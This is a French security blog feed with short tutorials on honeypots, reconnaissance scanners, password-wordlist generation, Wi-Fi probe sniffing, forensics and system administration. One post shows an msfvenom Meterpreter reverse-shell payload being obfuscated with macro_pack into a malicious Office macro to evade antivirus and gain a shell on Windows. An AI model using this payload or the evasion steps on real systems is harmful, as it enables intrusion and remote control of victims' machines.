Quantcast
Channel: Homputer Security
Viewing all 97 articles
Browse latest View live

La prise de photo de vos objets personnels comme méthode d’authentification supplémentaire

$
0
0


Des scientifiques de l’université internationale de la Floride et Bloomberg ont créé un système d’authentification à deux facteurs reposant sur la prise de photos d’objets personnels.
Ce nouveau système nommé Pixie parait plus sécurisé que tous les systèmes d’authentification actuels.

Avec Pixie, les utilisateurs sont demandés de prendre une photo d’un objet de leur choix via une application installée sur leur smartphone. Cet objet servira par la même occasion de token d’authentification.

Les utilisateurs pourront même rendre le procédé d’authentification via Pixie plus complexe grâce à des prises de certains angles ou de certaines parties de l’objet.
Pixie vous permettra d’utiliser n’importe quel appareil possédant une caméra, y compris les smartphones, les smartwatches ou bien d’autres.

Dans leur étude, les experts ont testé la sécurité de Pixie avec une attaque par force brute de 14.3 millions tentatives. Le système a atteint un taux d’acceptance erronée de seulement 0,09 %, en d’autres termes 9 identifications erronnées toutes les 10 000 tentatives de connexion.

L’autre avantage de Pixie c’est que ce système n’utilise pas de serveurs distants pour la validation du procédé d’authentification. Tout se passe en local à travers une application installée sur l’appareil mobile.

Bien que les chercheurs continuent de travailler sur Pixie, l’application est déjà disponible sur GitHub. Vous pourrez déjà le tester avec vos appareils.

Un document descriptif du système est disponible sur ce lien.

mdestroy

The post La prise de photo de vos objets personnels comme méthode d’authentification supplémentaire appeared first on Homputer Security.


Comment piéger vos attaquants avec un honeypot ?

$
0
0

Un honeypot est un système fake ou vulnérable intentionnellement conçu pour piéger les potentiels attaquants. Ce type de système fournit un bon moyen aux administrateurs d’observer les attaquants en action afin de mieux protéger leurs systèmes.

Il existe plusieurs types de honeypots. Dans ce guide, nous nous intéresserons à un simple honeypot SSH et plus particulièrement à Cowrie.
Cowrie est un honeypot SSH et Telnet qui peut servir à enregistrer les attaques par brute force et toutes les actions d’un attaquant s’il arrive à avoir accès au système.

Ci-dessous quelques caractéristiques de Cowrie:
_ Cowrie comprend un système de fichier fake avec la capacité d’ajouter et de retirer des fichiers, d’exécuter des commandes (ls, cat, wget, ifconfig, etc.),
_ Possibilité de voir les mots de passe utilisés durant les attaques par brute force,
_ Possibilité d’ajouter du contenu fake pour piéger encore plus un attaquant,
_ Les logs sont sauvegardés au format UML,
_ Cowrie sauvegarde les fichiers téléchargés avec wget ou curl et les fichiers uploadés avec SCP/SFTP pour des inspections ultérieures.

Dans ce guide, nous verrons comment installer le honeypot Cowrie sur un système Ubuntu 16.04.
NB: Pour ce test, j’utilise un VPS hébergé chez Scaleway.

Avant tout, mettez à jour votre système.

# apt-get update && sudo apt-get upgrade -y

Ensuite changez le port utilisé par le serveur SSH dans le fichier de configuration du démon. Choisissez un port autre que le port 22. L’objectif étant de rendre accessible le honeypot sur le port par défaut du protocole SSH.

Puis reloadez le service:

# service sshd reload

NB: Votre serveur ssh original sera accessible désormais sur le port que vous aurez choisi. Par précaution, avant de quitter votre session SSH active, démarrez une autre connexion SSH sur le nouveau port d’écoute configuré.

Installez toutes les dépendances réquises :

# apt-get install git python-virtualenv libssl-dev libffi-dev build-essential libpython-dev python2.7-minimal

L’étape suivante consiste à créer un compte utilisateur.
Par mésure de précaution, il est recommandé d’installer Cowrie sous un autre utilisateur n’ayant aucun aucun privilège.

# adduser –disabled-password cowrie

Accédez au nouveau compte d’utilisateur créé, puis téléchargez Cowrie:

# su -l cowrie
$ git clone http://github.com/micheloosterhof/cowrie.git

 

Déployez ensuite votre environnement virtuel à l’aide de virtualenv:

$ cd cowrie

$ virtualenv cowrie-env

Activez cet environnement, puis installez les packages requis pour le fonctionnement de Cowrie:

$ source cowrie-env/bin/activate

$ pip install -r requirements.txt

La configuration de Cowrie est stockée dans le fichier cowrie.cfg.dist et cowrie.cfg. Les deux fichiers sont lus et les entrées de cowrie.cfg ont une précédence. Pour cette expérience, nous ne ferons aucune modification dans ces fichiers.

Ajoutez la variable d’environnement suivante:

$ export PYTHONPATH=/home/cowrie/cowrie

Exécutez le script cowrie situé dans le dossier cowrie/bin pour démarrer le honeypot.

$ bin/cowrie start

Cowrie fonctionne par défaut sur le port 2222. Configurons alors un Port Forwarding afin que toutes les tentatives de connexion sur le port par défaut du protocole SSH soient redirigées vers le port 2222 utilisé par Cowrie.

# iptables -t nat -A PREROUTING -p tcp –dport 22 -j REDIRECT –to-port 2222

Cowrie vous permet de définir les combinaisons d’utilisateur/mot de passe qui accéderont au serveur fake. Pour ce faire, entrez dans le dossier cowrie/data, puis ouvrez le fichier userdb.txt.

Pour autoriser tous les mots de passes d’un utilisateur précis, ajoutez le symbole * au compte d’utilisateur.
Pour interdire un mot de passe précis, ajoutez le symbole ! près du mot de passe. Et pour autoriser une combinaison nom d’utilisateur/mot de passe, ajoutez cette combinaison comme dans l’image ci-dessous.

Le fichier cowrie.log situé dans le dossier cowrie/log contient toutes les entrées SSH.

Dans l’image ci-dessous, nous constatons qu’un attaquant a tenté des combinaisons root/xdr56tfc, root/7heaven et root/valentin1 pour se connecter à notre serveur.

Et nous constatons ici une connexion réussie. Les lignes qui suivent montrent toutes les commandes exécutées par notre attaquant.

Dans un prochain article, nous reviendrons en détail sur le log de Cowrie et verrons quels enseignements en tirer.

Enjoy !

mdestroy

The post Comment piéger vos attaquants avec un honeypot ? appeared first on Homputer Security.

TIDoS-Framework – l’outil de reconnaissance Web à découvrir

$
0
0

TIDoS-Framework est un outil écrit en Python utile pour des phases de reconnaissance dans des tests de pénétration sur des sites Web. Cet outil utilise une source publique (Hackertarget.com) pour trouver en ligne des informations qui pourraient s’avérer précieuses.
Quelques caractéristiques de TIDoS-Framework:
_ Capable de réaliser plusieurs tâches rien qu’avec le nom d’un domaine,
_ Parfait pour la reconnaissance complète d’un site Web,
_ Tous les scripts sont ordornés et arrangés dans un dossier séparé,
_ Teste votre site Web contre l’UDP Flood.

Installation

Clonez le repo GitHub de TIDoS-Framework:

git clone https://github.com/the-Infected-Drake/TIDoS-Framework.git

Puis lancez le script setup.py pour procéder à l’insallation:

python setup.py

Ensuite, choisissez votre système d’Intallation, puis procédez à l’installation.

Utilisation

Pour utiliser TIDoS-Framework, lancez le script tidos.py

python setup.py

Acceptez les conditions d’utilisation et l’interface de TIDoS s’affichera.


Voici tous les modules disponibles:

Ci-dessous, vous verrez quelques exemples d’utilisation TIDoS-Framework.
Le module info vous donne des informations sur votre réseau.

Le module geoip vous affiche la géolocalisation des site Web.

Le module webex vérifie si le site Web soumis existe.

Le module grabhead retourne l’entête HTTP des sites Web.

Le module nmap réalise un scan de port basique.

Happy Hacking !

mdestroy

The post TIDoS-Framework – l’outil de reconnaissance Web à découvrir appeared first on Homputer Security.

Mentalist – le générateur de wordlist en mode graphique

$
0
0

Mentalist est un outil graphique utile pour la création des wordlists personnalisées. Cet outil est également capable de générer des règles compatibles avec Hashcat et John The ripper.

Pour installer Mentalist sur votre système, rendez vous sur la page des releases du projet, puis téléchargez la toute dernière version de l’application.

Décompressez l’archive Zip téléchargée …

$ unzip Mentalist-v1.0-Linux-x86_64.zip

… Puis, lancez l’application Mentalist.

Mentalist vous permet de faire plusieurs combinaisons grâce à des noeuds qui sont réalité des options (ou modules) comprenant des fonctions spécifiques. Le noeud Append par exemple vous permet d’ajouter une chaîne de caractères spécifique à la suite des mots générés.
Voici l’ensemble des noeuds que comprend Mentalist:

_ Base Words: Ce noeud fournit une liste de mots de base qui seront utilisés par les autres noeuds pour un résultat final.
Parmi les Base Words disponibles avec Mentalist, vous trouverez entre autres, un dictionnaire anglais, des listes de noms communs d’hommes, de femmes, ou d’animal de compagnie, une liste de mois et saisons en anglais.
Vous pourrez par ailleurs fournir votre propre liste de mots de base à travers ce noeud.

_ Case: Ce noeud change la casse des lettres. Il vous permettra par exemple de mettre toutes les premières lettres des mots de base en majuscule et tout le reste en minuscule.

_ Substitution: Substitution vous permet de remplacer une lettre par un chiffre ou un symbole.

_ Prepend: Ce noeud ajoute une chaîne de caractères au début des mots composant la wordlist.

_ Append: Append ajoute une chaîne de caractères à la suite des mots composant la wordlist.

Dans l’image suivante, nous créeons une wordlist basée sur des noms communs d’hommes et de femmes ayant la 1ère, la 2ème ou la 3ème lettre en majuscule. Toutes les lettres a et e sont remplacées respectivement par @ et 3. Les mots générés commenceront par les caractères ! % $ et se termineront par des dates entre 1975 et 2017.
L’estimation totale des mots est de 526 485 960 soit près de 7.3 GB.

Voici, les premières lignes du résultats:

Happy Hacking !

mdestroy

The post Mentalist – le générateur de wordlist en mode graphique appeared first on Homputer Security.

Striker – le scanneur de vulnérabilité web

$
0
0

Striker est un scanneur de vulnérabilité Web. Cet outil automatise plusieurs tests de vulnérabilités en utilisant des sources publiques comme Shodan, Whatcms.org, Crimeflare.info, Censys.io .
Ci-dessous quelques caractéristiques de Striker:
_ détermine le type de CMS utilisé, puis lance automatiquement WPScan si le CMS est wordpress,
_ recupère les fichiers robots.txt,
_ réalise un scan des ports,
_ effectue un scan XSS basique,
_ récupère les emails liés à la cible,
_ vérifie si la cible est un honeypot,
_ réalise un fingerprint du système d’exploitation utilisé par la cible,
_ vérifie si la cible utilise Cloudflare,
_ etc.

Pour télécharger l’outil, clonez son repo GitHub:

git clone https://github.com/UltimateHackers/Striker.git

Utilisation

Pour utiliser Striker, vous n’aurez qu’à lui fournir un nom de domaine, puis l’outil réalisera ces tests pour vous.

mdestroy

The post Striker – le scanneur de vulnérabilité web appeared first on Homputer Security.

Analyse de logs d’un honeypot SSH

$
0
0

Dans un article récent, je vous introduisais à Cowrie, le honeypot ssh.
Pour rappel, un honeypot est un serveur vulnérable intentionnellement conçu pour attirer et identifier de potentiels adversaires. L’objectif derrière cette manoeuvre est d’apprendre sur ses adversaires, afin de mieux sécuriser ses connexions à distance.
En réalité, aussitôt que vous rendez disponible n’importe quel type d’appareil sur la Toile (serveur ssh, serveur http, objet IoT, etc.), des centaines de bots (parfois des scripts kiddies) tenteront de s’y introduire grâce à des attaques par force brute.

Pour démontrer cette assertion, j’ai réalisé une expérience avec Cowrie durant la période du 3 Novembre au 10 Novembre 2017.

Dans ce billet, nous analyserons les logs générés par le honeypot durant cette période, puis nous verrons quelles solutions appliquer pour être à l’abri de toutes les menaces de la Toile.

Pour l’analyse de ces fichiers, j’ai eu recours aux outils de manipulation de texte du langage de script Bash, c’est à dire grep, cut, sort, uniq, cat et head.
Les logs du Honeypot sont tous stockés dans le dossier cowrie/log.

Image 1. Logs générés par cowrie

Image 1. Logs générés par cowrie

En tout nous avons eu 141 317 tentatives erronées soit 736 tentatives toutes les heures.

Image 2. Nombre total de tentatives erronées

Image 2. Nombre total de tentatives erronées

Les logs comprennent en tout 1 011 367 lignes.

Image 3. Nombre total des lignes comprennant l'ensemble des logs

Image 3. Nombre total des lignes comprennant l’ensemble des logs

Voici les 40 adresses qui ont le plus tenté à se connecter au pot de miel:
NB: Les chiffres sur la gauche des adresses IP désignent les tentatives de connexion.

Image 4. Top 40 des adresses intrusives

Image 4. Top 40 des adresses intrusives

Ci-dessous le top 40 des comptes d’utilisateurs qui ont été le plus utilisé durant ces tentatives d’intrusion.

Image 5. Top 40 des comptes d'utilisateurs utilisés

Image 5. Top 40 des comptes d’utilisateurs utilisés

Enfin, le top 40 des mots de passe utilisés par les bots.

Image 6. Top 40 des mots de passe utilisés

Image 6. Top 40 des mots de passe utilisés

Quelles solutions pour être à l’abri ?

L’utilisation de Fail2ban

Outre la complexité des mots de passe, vous pourrez également utiliser un système de détection d’intrusion comme Fail2ban pour la protection de votre serveur.
En effet, cette solution réduit considérablement les chances de succès des attaques par force brute. Ci dessous le log ssh d’une machine sur laquelle Fail2ban a été configuré pour blacklister toute adresse qui échouerait au moins à deux tentatives de connexion.

Image 7. Log d'un serveur ssh configuré avec Fail2ban

Image 7. Log d’un serveur ssh configuré avec Fail2ban

Désactiver les accès root

Comme l’image 5 l’indique, l’utilisateur root est le premier ciblé par les attaques car il dispose de tout les droits d’administration. Une bonne manoeuvre serait alors de désactiver les accès au compte root. L’accès à ce compte restera toutefois disponible via les commandes su et sudo pour tout autre utilisateur appartenant au groupe sudo.

L’authentification par clé publique

Cette méthode consiste en une authentification via une cryptographie assymétrique. Le client va devoir générer une paire de clés, une publique et une privée. Il conservera sa clé privée, puis et enverra sa clé publique au serveur SSH. Cette clé publique permettra au serveur de reconnaître le client.

L’authentification à deux facteurs

Le module PAM Google Authenticator vous permet de protéger votre serveur avec une authentification à deux facteurs.
Ci-dessous deux tutoriels sur l’intégration de ce module à OpenSSH:

J’espère que vous avez apprécié cette mini-série d’articles sur Cowrie. 🙂

mdestroy

The post Analyse de logs d’un honeypot SSH appeared first on Homputer Security.

Comment enregistrer les trames WiFi des smartphones avec Probemon ?

$
0
0

Les smartphones émettent des trames WiFi en permanence pour faciliter la géolocalisation.
Malheureusement, cette fonction peut être abusée pour des fins de surveillance.
En effet, elle est activée par défaut sur la plupart des smartphones Android du marché, et même si vous désactivez le WiFi, vos téléphones continueront d’émettre des trames.
Tel est le résultat d’une récente étude menée par des chercheurs français.

Pour comprendre de quoi il s’agit concrètement, nous réaliserons un simple test avec Probemon.

Probemon est un script Python qui peut être utilisé pour répérer des appareils émettant des trames Wi-Fi. Probemon enregistre notamment les adresses MAC de tous les appareils environnants ainsi que la force de leur signal.

Installation

Commençons d’abord par installer Netaddr et Scapy , les seules dépendances réquises pour l’utilisation de Probemon.

# git clone https://github.com/drkjam/netaddr
# cd netaddr
# python setup.py install

# git clone https://github.com/secdev/scapy.git
# cd scapy
# python setup.py install

Clonons ensuite le repo de Probemon:

# git clone https://github.com/nikharris0/probemon.git

Voici le menu d’aide de Probemon:

Avant d’utiliser Probemon, il est nécessaire de mettre notre carte Wi-Fi en mode moniteur à l’aide de airmon-ng:

# airmon-ng start wlan0

Test

Pour cette expérience, nous utiliserons un smartphone Samsung sur lequel nous prendrons le soin de désactiver le WiFi.

Lorsque nous lançons Probemon, l’adresse MAC du smartphone reste détectable malgré la désactivation du WiFi.

Réalisons une nouvelle expérience. Cette fois après avoir désactivé le WiFi, nous activons l’option Rechercher uniquement lorsque le WiFi est activé. Vous trouverez cette option en suivant ce chemin sur votre smartphone:
Paramètres/WiFi/Plus/Toujours autoriser la recherche.

Dans cette nouvelle expérience, l’adresse MAC du smartphone n’est pas détectée par Probemon.

Capter une telle requête peut confirmer la présence d’un utilisateur.
Les conséquences de ces émissions peuvent être énormes. Par exemple, les spécialistes du marketing de la distribution peuvent se servir de telles informations pour analyser les fréquentations de certains magasins par de potentiels clients. Aussi, ces requêtes pourraient faciliter une phase de reconnaissance au sein d’une entreprise. Des pirates pourraient s’en servir également pour espionner des employés.

Probemon est un outil très intéressant dans la mesure où il vous permettra de savoir si vos appareils (smartphones, laptops, imprimantes, objet connecté, etc.) émettent ces trames WiFi à votre insu.
Dans notre exemple, l’option Rechercher uniquement lorsque le WiFi est activé nous a permis de bloquer ces émissions. Il peut arriver que cette option soit absente sur certains smartphones voire impossible à désactiver. Cette option n’est pas clairement décrite dans l’ensemble des versions d’Android. La désactiver de façon permanente peut être problématique car l’exécution de certaines applications comme Google Maps requiert son activation.

mdestroy

The post Comment enregistrer les trames WiFi des smartphones avec Probemon ? appeared first on Homputer Security.

Plusieurs applications Android vous espionnent sécrètement

$
0
0



Un travail collaboratif entre Yale Privacy Lab et Exodus Privacy montre que plusieurs applications populaires sur Android incluent des trackers. Ces trackers pour la plupart enregistrent l’activité des utilisateurs à leur insu.

Un tracker est un type de logiciel destiné à collecter des informations sur des internautes ou leur activité.
Ce type de programme permet aux sites Web (ou tierces parties) entre autres de déterminer l’itinéraire de visite des utilisateurs, les temps et les dates de leurs visites, et même de noter leurs moindres faits et gestes afin d’établir leurs profils (et pas seulement de consommateur).

La récente recherche conduite par les équipes de Yale Privacy Lab et Exodus Privacy confirme que le tracking existe bel et bien avec les applications Android.
Trois quarts des 300 applications scannées par les chercheurs dont Spotify, Uber, Twitter, SoundCloud, Snapchat incluent des trackers.

Alors que certains trackers collectent que des rapports de crash comme Google CrashLytics, d’autres par contre collectent des informations sensibles telles que l’activité et les données de l’utilisateur.
OutBrain collecte par exemple les noms des utilisateurs, leur adresse mail, leur adresse IP, l’ID de leur appareil. Un autre tracker du nom de Fidzup permet à un guide restaurant français Bottin Gourmand de tracer la localisation physique de ses utilisateurs via des hauts parleurs vendus dans des magasins. Les informations sont ensuite partagées avec les applications Auto Journal et Telestar.


La liste complète des trackers est disponible ici.

L’étude menée par les deux compagnies a résulté en la création d’un site Web dédié à l’identification des trackers et d’un repo GitHub destiné à la sensibilisation des internautes. Ce repo inclut un guide d’aide sur le marketing basé sur le tracking, un glossaire de termes, une liste d’acronymes, et une liste de permissions des applications Android.
Le site conçu par Exodus liste les trackers inclus dans chaque application scannée ainsi que les informations collectées, la politique de confidentialité des trackers, et les permissions des applications.

Selon les chercheurs, l’utilisation des trackers n’est pas forcement mauvaise. Certains tracking sont conduits dans l’objectif de délivrer des publicités ciblées aux utilisateurs, tandis que d’autres utilisent la localisation pour d’autres raisons.
Mais le manque de transparence dans la collecte, la transmission et le traitement de données via ces trackers suscite d’importantes inquiétudes en ce qui concerne la protection de la vie privée et peut être un risque de sécurité grave pour tout utilisateur.

Toutes les applications utilisées pour l’étude ont été téléchargées directement à partir de l’App Store Google.

Les chercheurs ont aussi créé des signatures de tous les trackers détectés. Une chose qui permettra aux vendeurs en sécurité mobile d’ identifier plus facilement les applications incluant des trackers.

Source: PrivacyLab.yale.edu

mdestroy

The post Plusieurs applications Android vous espionnent sécrètement appeared first on Homputer Security.


Apprenez plus facilement les commandes de Linux avec TLDR

$
0
0


TLDR est un outil en ligne de commande fournissant des résumés simplifiés de l’utilisation des commandes sous Linux. Si vous êtes débutant sur Linux, TLDR est pour vous.
Grâce à des exemples clairs et précis, TLDR vous permettra d’apprendre plus facilement toutes les commandes. Seul bémol, TLDR est en Anglais, mais cela ne devrait poser aucun problème vu la simplicité de l’outil et la clarté des explications.

Installation

Il existe plusieurs clients TLDR.
Vous pouvez installer le client Python comme suit:

$ sudo pip install tldr

Utilisation

A son exécution, TLDR vous donne une courte description de la commande fournie suivi de quelques exemples.
L’outil ne liste pas toutes les options des commandes mais seulement les plus populaires.
Voici quelques exemples de son utilisation.


Il existe également un client web disponible sur ce lien.

Un document PDF regroupant tous les résumés simplifiés de TLDR est également à votre disposition.

Enjoy 🙂

mdestroy

The post Apprenez plus facilement les commandes de Linux avec TLDR appeared first on Homputer Security.

Linux-explorer – l’outil d’analyse forensic en mode graphique

$
0
0


Linux-explorer est une collection d’outils pour l’analyse forensic en “live” sous Linux.
Cet outil doté d’une interface graphique est écrit en Python3 et Flask.
Linux-explorer requiert l’installation de Yara et chkrootkit.
Quelques caractéristiques de Linux-explorer:
_ Visualisation des processus en cours d’exécution sur la machine Linux en un clic,
_ Listage des utilisateurs du système,
_ Recherche de fichier par nom ou regex,
_ Récupère automatiquement les fichiers logs importants du système: auth.log, syslog, ufw.log, bash_history,
_ Scan de fichiers à l’aide de Yara et chkrootkit.

Installation

Pour installer linux-explorer, clonez son repo GitHub:

$ git clone https://github.com/intezer/linux_explorer.git

Puis, installez les dépendances:

$ cd linux-explorer
$ sudo pip install -r requirements.txt

Enfin, installez yara et chkrootkit:

$ sudo apt-get install yara chkrootkit

Lancez linux-explorer à partir du script linux-explorer.py:

$ sudo python linux-explorer.py

Puis connectez vous à l’adresse indiquée dans le terminal:

Utilisation

Ci-dessous, vous verrez quelques screenshots de l’utilisation de linux-explorer:


mdestroy

The post Linux-explorer – l’outil d’analyse forensic en mode graphique appeared first on Homputer Security.

Comment réaliser vos backups personnels avec Duplicati ?

$
0
0

Duplicati est un client Backup Open Source et multiplateforme qui sauvegarde vos backups de façon sécurisée sur plusieurs types de stockage comme des serveurs de fichiers distants ou des services de stockage Cloud comme Amazon, Onedrive, etc.
Duplicati utilise un backup incrémental.

Ci-dessous quelques caractéristiques de Duplicati:

_ Support du chiffrement AES et Gnu Privacy Guard,
_ Duplicati est dôté d’un planificateur, utile pour la planification de vos backups,
_ Duplicati est disponible en ligne de commande et comme application avec interface graphique,
_ Duplicati peut réaliser des backups des fichiers ouverts ou vérrouillés grâce à VSS (Volume Snapshot Service) sous Windows et LVM (Logical Volume Manager) sous Linux,
_ Duplicati permet le backup de dossiers et de tout type de fichier.
_ Duplicati supporte Amazon S3, OneDrive, Google Drive, Rackspace Cloud Files, HubiC, Backblaze (B2), Amazon Cloud Drive (AmzCD), Swift / OpenStack, WebDAV, SSH (SFTP), FTP, etc.

Dans ce tutoriel, nous verrons comment installer Duplicati sur un système headless Debian Stretch.

Installation

Rendez-vous sur la page des releases du projet pour télécharger la toute dernière version de Duplicati.

Puis, installez le logiciel avec dpkg, puis les dépendances manquantes avec apt-get:

# dpkg -i duplicati_2.0.2.1-1_all.deb
# apt-get –fix-broken install

Démarrez, puis activez le démon au démarrage du système:

# systemctl start duplicati.service
# systemctl enable duplicati.service

Duplicati est alors accessible sur notre serveur headless à l’adresse localhost:8200.
Pour accéder au logiciel à partir d’une autre machine, nous utiliserons un Port Forwarding local via ssh:

# ssh 8000:localhost:8200 root@adresse-serveur

Cette commande ci-dessus nous permettra de réacheminer toute requête sur le port 8000 de notre machine local vers le service Duplicati fonctionnant sur l’adresse localhost:8200 de notre serveur headless. Toutes ces opérations seront tunnelisées à travers le protocole ssh.

Grâce à cette commande, nous accédons à Duplicati à l’adresse localhost:8000 de notre machine.

A l’aide du menu Settings (Paramètres) vous pourrez à tout moment changer la langue de l’interface utilisateur.

Création d’un backup

Pour créer un backup avec Duplicati, choisissez le menu Ajouter sauvegarde, puis Configurer une nouvelle sauvegarde.

Choisissons un nom pour le backup, le type de chiffrement, puis une phrase sécrète pour le chiffrement.

Nous sauvegarderons le backup sur un serveur distant via sftp.
Saissons alors le nom d’hôte (ou l’adresse ip) de notre serveur, le port, le chemin vers l’emplacement où le backup sera installé, le nom d’utilisateur  du serveur distant et le mot de passe.

Il est possible de vérifier la connexion vers le serveur distant à l’aide du bouton Tester la connexion.

Choisissons à présent les données qui seront sauvegardées.

A l’aide du planificateur, il est également possible de planifier les backups.

La dernière étape consiste à enregistrer la sauvegarde.

 

Enfin, il suffira de cliquer sur le lien Démarrer votre sauvegarde pour entamer la première sauvegarde.

mdestroy

The post Comment réaliser vos backups personnels avec Duplicati ? appeared first on Homputer Security.

Comment installer un serveur OpenSSH sur Windows ?

$
0
0

La toute dernière mise à jour Windows Fall Creators Update (build 1709 (16299.19)) comprend un client et un serveur OpenSSH. Ces programmes sont disponibles dans le menu Gérer les fonctionnalités facultatives de vos Paramètres Windows. OpenSSH client et serveur sont encore en bêta sur Windows, il faudrait alors attendre un peu avant de l’utiliser sur des environnements de production.
Dans ce billet, nous verrons comment mettre en place un serveur OpenSSH sur un système Windows 10.

Commençons par installer le serveur OpenSSH.
Ouvrez vos Paramètres Windows en cliquant simultannément la touche Windows de votre clavier et la touche i, puis saisissez dans la barre de recherche “gérer”.
Puis ouvrez le menu Gérer les fonctionnalités facultatives.

Cliquez sur Ajouter une fonctionnalité,

Puis, installez OpenSSH Server (Beta).

Cliquez simultannément les touches Windows et r de votre clavier, puis saisissez secpol.msc pour ouvrir la stratégie de sécurité locale.

Sous Paramètres de sécurité, développez les Stratégies locales, puis faîtes un double clic sur l’Attribution des droits utilisateur. Localisez la stratégie Remplacer un jeton de niveau processus.

Faites un double clic sur la stratégie, puis assurez-vous que le compte NT Service\sshd est bien présent.

Dans le cas où le compte est absent, ajoutez-le en cliquant sur Ajoutez un utilisateur ou groupe, puis saisissez NT Service\sshd. Validez avec OK.

La prochaine étape consiste à créer la paire de clé qui sera utilisée pour chiffrer les échanges entre le serveur et le client.

Pour cela, ouvrez votre ligne de commande avec les privilèges d’administrateur, naviguez vers le dossier C:\Windows\System32\OpenSSH\, puis lancez la commande ci-dessous:

ssh-keygen.exe -A

Vous verrez les clés dans le dossier C:\Windows\System32\OpenSSH\

Enfin, nous allons changer le propriétaire de la clé privée ssh_host_ed25519_key.
Avant, ouvrez les Propriétés de la clé, puis le menu Sécurité, et supprimez tout autre utilisateur ou groupe d’utilisateur ayant accès au fichier, puis assurez-vous que l’autorisation de sshd est à Lecture seule.

Modifiez ensuite le propriétaire de la clé privée à NT Service\sshd.

Enfin, démarrons sshd. Cliquez simultannément les touches Windows et r de votre clavier, puis saisissez services.msc pour ouvrir la console des services. Localisez le service sshd, puis démarrez-le.

En dernier lieu, vous devez autoriser sshd à travers le Firewall.

Netstat confirme que le port 22 est accessible.

Le serveur ssh devrait être maintenant accessible depuis l’extérieur.

Dans un prochain article, nous verrons comment installer le client ssh sous Windows.

mdestroy

The post Comment installer un serveur OpenSSH sur Windows ? appeared first on Homputer Security.

Comment transférer des fichiers entre deux serveurs distants avec rsync ?

$
0
0

Imaginez un scénario où vous devez transférer des fichiers volumineux entre deux serveurs distants. Sur le système A, un serveur ssh y est installé et sur le serveur B, aucne connexion ssh n’est possible et seul un démon rsync y est installé. La seule alternative qui se présente à nous alors est de transférer les fichiers via rsync entre les deux serveurs.

Pour info, voici comment installer un démon ssh sur un système basé sur Debian (testé sur Ubuntu 16.04 et Debian Stretch):

D’abord, créez le fichier de configuration pour le démon rsync:

# nano /etc/rsyncd.conf

Voici un exemple de fichier de configuration:

[backup]
# répertoire de destination. Les dossiers transférés seront installé dans ce dossier
path = /root/backup
# hôtes autorisés à accéder au serveur, seul l’hôte 192.168.1.2 est autorisé
hosts allow = 192.168.1.2
# hôtes privés d’accès. * pour tous les hôtes
hosts deny = *
list = true
# permission du compte d’utilisateur sur le serveur de destination
uid = root
# permission du groupe de l’utilisateur
gid = root

Ci-dessous le fichier de configuration de notre serveur de destination B:

Ensuite, démarrez, puis activez le démon au démarrage du système:

# systemctl start rsync
# systemctl enable rsync

A partir de notre machine locale donc, nous pouvons réaliser le transfert de fichiers entre les serveurs A et B à l’aide de la commande ci-dessous:

ssh utilisateur@serveur-A rsync [options] /chemin/vers/source utilisateur@serveur-B::nom-du-repertoire-de-destination


Nous constatons la présence du dossier sur le repertoire de destination.

J’espère que cette astuce vous sera utile.

🙂

mdestroy

The post Comment transférer des fichiers entre deux serveurs distants avec rsync ? appeared first on Homputer Security.

Comment pirater un système Windows à l’aide d’un fichier Macro ?

$
0
0


macro_pack est un outil hacking écrit en Python3 fournissant une méthode avancée d’obfusquation de fichiers Macro malicieux. L’objectif de cet outil, selon son auteur, est de simplifier l’exploitation des systèmes et le contournement des antimalwares/antivirus.
Cet outil est compatible avec tous les payloads générés par les frameworks de pentest tels que Metasploit, Empire, etc.

Installation

Clonez le repo de l’outil:

# git clone https://github.com/sevagas/macro_pack.git

Puis, installez les dépendances requises pour l’installation de macro_pack.

# cd macro_pack
# pip3 install -r requirements.txt

Enfin, lancez le script macro_pack.py disponible dans le dossier macro_pack/src:

# python3 macro_pack.py

Voici le menu d’aide de macro_pack:

Exemple d’utilisation

Créeons un fichier vba malicieux.
La commande ci-dessous permet d’obfusquer le fichier vba généré par msfvenom. Le résultat est enregistré dans un nouveau fichier vba qui sera sauvegardé dans le dossier macro_pack/src.

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.30 -f vba | macro_pack.py -o -G macro.vba

 

Créeons un script Meterpreter, puis lançons msfconsole à partir de ce script.

A l’exécution du macro vba par la victime, nous obtenons un shell.

Happy Hacking !

mdestroy

The post Comment pirater un système Windows à l’aide d’un fichier Macro ? appeared first on Homputer Security.

Comment effectuer des recherches à travers des fichiers pdf avec pdfgrep ?

$
0
0

Comme vous le savez, les outils de recherche de texte comme grep ou egrep sont limités aux fichiers textes et ne sont d’aucune utilité sur les fichiers au format pdf.
pdfgrep est une utilité écrite en Python3 qui rend possible la recherche de texte à travers des fichiers pdf depuis votre ligne de commande.
Contrairement à grep qui opère sur les lignes, pdfgrep opère sur les pages.
Dans ce billet, nous verrons comment installer l’outil de recherche, puis quelques exemples de son utilisation.

Installation

Sur les systèmes basés sur Debian, installez pdfgrep à l’aide de la commande ci-dessous:

$ sudo apt install pdfgrep

Voici le menu d’aide de pdfgrep:

Exemples d’utilisation

pdfgrep utilise ce format:

pdfgrep [Option] motif [chemin vers le fichier pdf]

Sans option, pdfgrep retourne tous les motifs (mots ou textes) retrouvés dans le fichier pdf.

Ci-dessous quelques exemples de l’utilisation de pdfgrep.


L’option n permet la numérotation des résultats.
L’option H imprime le nom du fichier à chaque correspondance.
L’option m permet de spécifier le nombre de correspondances à retourner.

 
 


L’option p retourne le nombre de correspondances par page.
 
 


L’option i désactive la sensibilité à la casse.
 
 


L’option r permet d’effetuer des recherches dans des dossiers de façon récursive.
 
 


L’option C indique le nombre de caractères à afficher pour chaque correspondance.

Enjoy !

🙂

mdestroy

The post Comment effectuer des recherches à travers des fichiers pdf avec pdfgrep ? appeared first on Homputer Security.


PiKarma – Le script Python qui vous protège contre les attaques Karma

$
0
0

PiKarma est un projet Open Source conçu par Besim Altinok, chercheur en sécurité turc.
Cet outil, écrit en Python est capable de détecter les attaques Karma, un type d’attaque Man-in-The-Middle porté notamment sur les réseaux WiFi.

Lorsque vous vous connectez pour la première fois à un nouveau réseau WiFi, votre appareil sauvegarde des informations sur cette nouvelle connexion. Ceci dans un but de faciliter la prochaine connexion de l’appareil lorsque vous vous retrouverez aux alentours du point d’accès.

C’est ainsi que votre appareil émet des trames WiFi (Probe requests) à l’affût de réseaux WiFi précédemment utilisés lorsque vous activez le WiFi (et parfois même sans son activation).

Le principe d’une attaque Karma est simple. Un attaquant configurerait un point d’accès fake dans le but d’accepter les requêtes de votre appareil en lui faisant qu’il est un point d’accès connu de votre appareil.
Si la connexion se met en place, vos données seront dès lors à risque.

PiKarma permet aux utilisateurs de tester la sécurité des réseaux WiFi avant le début de toute communication.
